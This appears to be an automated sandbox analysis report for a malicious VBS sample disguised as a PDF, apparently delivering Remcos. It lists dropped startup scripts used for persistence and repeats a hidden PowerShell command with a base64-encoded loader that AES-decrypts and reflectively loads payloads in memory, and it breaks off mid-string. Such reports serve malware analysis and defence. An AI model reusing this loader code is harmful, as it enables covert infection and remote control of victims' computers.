Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Hellas,pdf.vbs
|
ASCII text, with very long lines (56392), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\WordDoc.bat
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a5yiuwf.ydd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dqoki1c.1mu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfljvoho.bfl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eciuxav2.5us.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehxsh5mx.xdi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hghdlwls.ci1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lj3hopmb.1d5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkfinncd.5ru.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsbw2ubi.hvm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrmc1wpb.b4p.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwrqyxfv.54z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbcrgzyh.cgs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vyhzyy0k.isc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrtt0vdr.bh0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x01rabdr.y1q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3hvypzd.001.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxk0hc3p.ltq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4hvtlwp.mpe.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d67225f.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_91fb5707.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_97423272.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9ede7b6f.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bb8d17be.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8e68097.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb4fe679.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb5dd181.cmd
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\dwm.bat
|
ASCII text, with very long lines (58995), with CRLF line terminators
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF, LF line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 25 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Hellas,pdf.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WordDoc.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\WordDoc.bat"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd"
"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb5dd181.cmd"
"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb5dd181.cmd"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_91fb5707.cmd"
"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_91fb5707.cmd"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgIC